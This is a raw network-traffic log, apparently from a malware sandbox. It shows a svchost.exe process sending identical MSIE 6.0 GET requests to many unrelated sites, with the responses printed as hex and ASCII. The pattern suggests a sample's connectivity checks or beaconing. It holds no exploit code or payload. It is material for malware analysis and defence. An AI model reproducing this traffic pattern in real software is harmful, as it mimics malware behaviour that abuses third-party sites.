                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: diamir.de
                                                                                                                                                                              2023-09-15 05:27:23 UTC52INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Location: https://www.diamir.de/
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              2023-09-15 05:27:23 UTC52INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              30192.168.2.345979185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5633OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:28:19 UTC5687INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:18 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:28:19 UTC5688INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              31192.168.2.34599991.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5686OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: pleszew.policja.gov.pl
                                                                                                                                                                              2023-09-15 05:28:22 UTC8253INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:27 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              2023-09-15 05:28:22 UTC8254INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                              Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                              2023-09-15 05:28:22 UTC8269INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 0d 0a 32 30 30 30 0d 0a 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d
                                                                                                                                                                              Data Ascii: </div> </article> </section> </section></div>... topnews. -->... content --><div 2000id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci -
                                                                                                                                                                              2023-09-15 05:28:22 UTC8285INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2e 67 69 66 3f 76 3d 31 36 35 37 0d 0a 31 30 30 30 0d 0a 31 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68
                                                                                                                                                                              Data Ascii: margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html" target="_top" aria-label="Guchoniemi"><img src="/dokumenty/batony/4104.gif?v=16571000112618" alt="Guchoniemi" aria-hidden="true" /></a></div><div class="item" style="width
                                                                                                                                                                              2023-09-15 05:28:22 UTC8301INData Raw: 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 0d 0a 31 36 36 0d 0a 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74
                                                                                                                                                                              Data Ascii: <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul> <div class="clea166r"></div> </div> </div> </footer> ... foot


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              32192.168.2.346186104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:19 UTC5687OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: hyab.se
                                                                                                                                                                              2023-09-15 05:28:19 UTC5736INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:19 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 5680
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                              Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              cf-mitigated: challenge
                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GOo4sRMkSkwboLarPadmqJAcp5wK%2FtwIDF72RJiLEq%2FYHDigWT%2FwJNGsPNr2LJFXb8Qk%2FzrmK4fvhW7FpcnxoEdvRFYfG6ZCOPIGZfdk7ni2vIN8vZFZwTUe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e77304fb0c359-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              2023-09-15 05:28:19 UTC5738INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compa
                                                                                                                                                                              2023-09-15 05:28:19 UTC5738INData Raw: 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c
                                                                                                                                                                              Data Ascii: tible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body cl
                                                                                                                                                                              2023-09-15 05:28:19 UTC5739INData Raw: 33 64 4d 4b 51 71 70 32 33 37 77 34 48 65 56 6f 41 6a 50 4c 50 34 72 5a 63 78 73 38 6c 71 7a 4e 56 64 68 31 53 72 36 68 75 67 68 30 68 49 6b 61 4e 74 62 65 66 4b 61 4f 4c 35 52 52 44 52 48 45 73 37 33 50 44 71 41 73 31 71 53 30 7a 62 4e 4f 77 43 78 4c 6b 6d 58 53 56 78 6b 6c 38 59 67 46 76 71 2d 51 62 41 4c 39 44 64 5f 69 5f 49 32 46 4c 67 69 74 33 6a 57 4b 5f 6f 58 56 62 76 4b 6d 75 72 4e 55 36 52 57 5a 5f 47 72 72 48 57 5f 70 77 70 50 4f 44 45 6b 75 54 4e 59 45 47 75 4e 31 44 56 52 70 63 35 4d 6c 67 66 44 57 57 6f 6d 37 61 46 39 67 6a 4a 31 2d 47 59 4f 64 52 6b 66 69 74 54 71 55 58 57 76 5a 6f 34 63 7a 55 74 5a 57 4f 64 31 79 67 79 77 31 30 4d 58 50 33 6b 32 47 54 57 31 38 39 45 6e 31 42 57 59 43 6e 31 45 47 4c 62 4d 57 48 2d 42 67 56 44 66 4c 61 42 4f
                                                                                                                                                                              Data Ascii: 3dMKQqp237w4HeVoAjPLP4rZcxs8lqzNVdh1Sr6hugh0hIkaNtbefKaOL5RRDRHEs73PDqAs1qS0zbNOwCxLkmXSVxkl8YgFvq-QbAL9Dd_i_I2FLgit3jWK_oXVbvKmurNU6RWZ_GrrHW_pwpPODEkuTNYEGuN1DVRpc5MlgfDWWom7aF9gjJ1-GYOdRkfitTqUXWvZo4czUtZWOd1ygyw10MXP3k2GTW189En1BWYCn1EGLbMWH-BgVDfLaBO
                                                                                                                                                                              2023-09-15 05:28:19 UTC5740INData Raw: 68 75 50 35 47 41 36 43 62 43 5f 59 6c 57 6f 33 43 72 47 73 42 69 51 6c 76 78 55 70 5a 63 48 37 58 74 46 61 76 65 47 33 51 30 6b 4a 4d 52 33 74 68 45 41 51 6b 64 76 6e 2d 59 38 45 34 72 47 6a 78 33 76 76 58 72 77 55 4d 70 74 48 75 76 74 69 71 57 77 77 35 75 73 41 65 71 57 50 4b 50 63 57 69 37 73 58 4d 66 4b 6c 42 59 63 63 4e 37 70 41 32 44 71 63 46 44 51 56 6d 71 52 72 56 50 4f 78 4c 51 66 47 6c 51 50 6d 51 5a 31 77 62 65 79 51 73 4d 79 38 45 59 72 35 49 67 56 52 33 47 4b 63 69 75 4a 73 5f 57 7a 6f 65 70 72 56 33 51 6d 44 44 50 32 74 5f 49 72 30 73 7a 4b 77 61 5a 72 58 64 48 72 6a 49 65 4f 4f 7a 46 74 4b 50 35 4b 41 76 38 38 49 53 4f 32 61 57 59 54 6e 65 51 64 32 36 53 54 68 42 59 6f 49 6e 77 66 45 5a 75 6d 50 69 48 38 64 59 6b 39 7a 5f 46 34 77 62 6f 5f
                                                                                                                                                                              Data Ascii: huP5GA6CbC_YlWo3CrGsBiQlvxUpZcH7XtFaveG3Q0kJMR3thEAQkdvn-Y8E4rGjx3vvXrwUMptHuvtiqWww5usAeqWPKPcWi7sXMfKlBYccN7pA2DqcFDQVmqRrVPOxLQfGlQPmQZ1wbeyQsMy8EYr5IgVR3GKciuJs_WzoeprV3QmDDP2t_Ir0szKwaZrXdHrjIeOOzFtKP5KAv88ISO2aWYTneQd26SThBYoInwfEZumPiH8dYk9z_F4wbo_
                                                                                                                                                                              2023-09-15 05:28:19 UTC5742INData Raw: 58 47 4e 46 61 5a 4a 51 73 7a 6d 73 47 32 33 57 39 59 39 69 76 33 7a 35 67 67 34 78 68 62 73 4c 4b 5a 37 75 6a 78 46 6b 70 61 62 4d 4c 6b 37 46 63 76 4a 66 39 68 71 76 32 32 70 41 51 6b 58 46 4a 4c 49 76 58 49 33 38 34 6a 6b 44 58 75 79 50 34 59 4e 34 72 6e 52 41 6a 30 35 4f 68 4e 33 70 64 55 57 44 67 45 6d 4c 43 37 6b 31 56 2b 4e 38 2f 37 76 65 38 33 77 6c 39 4b 78 50 32 5a 52 46 73 2f 6b 51 64 75 76 64 30 49 4c 47 4f 78 4d 64 54 41 46 49 59 65 32 55 78 44 43 6a 46 6d 44 4d 68 73 4e 66 69 31 47 4b 37 6e 32 51 31 2b 6f 46 61 4d 6d 78 45 56 78 56 6c 70 58 69 36 5a 4a 70 77 72 63 56 30 72 6e 4f 66 73 3d 27 2c 74 3a 20 27 4d 54 59 35 4e 44 63 31 4e 54 59 35 4f 53 34 79 4e 44 41 77 4d 44 41 3d 27 2c 63 54 3a 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 44 61 74 65 2e
                                                                                                                                                                              Data Ascii: XGNFaZJQszmsG23W9Y9iv3z5gg4xhbsLKZ7ujxFkpabMLk7FcvJf9hqv22pAQkXFJLIvXI384jkDXuyP4YN4rnRAj05OhN3pdUWDgEmLC7k1V+N8/7ve83wl9KxP2ZRFs/kQduvd0ILGOxMdTAFIYe2UxDCjFmDMhsNfi1GK7n2Q1+oFaMmxEVxVlpXi6ZJpwrcV0rnOfs=',t: 'MTY5NDc1NTY5OS4yNDAwMDA=',cT: Math.floor(Date.
                                                                                                                                                                              2023-09-15 05:28:19 UTC5743INData Raw: 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: hild(cpo);}());</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              33192.168.2.34622894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:19 UTC5743OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: diamir.de
                                                                                                                                                                              2023-09-15 05:28:19 UTC5823INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:19 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Location: https://www.diamir.de/
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              2023-09-15 05:28:19 UTC5824INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              34192.168.2.346433185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:19 UTC5823OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:28:19 UTC6000INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:19 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:28:19 UTC6001INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              35192.168.2.34803394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:20 UTC6379OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.diamir.de
                                                                                                                                                                              2023-09-15 05:28:20 UTC7122INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
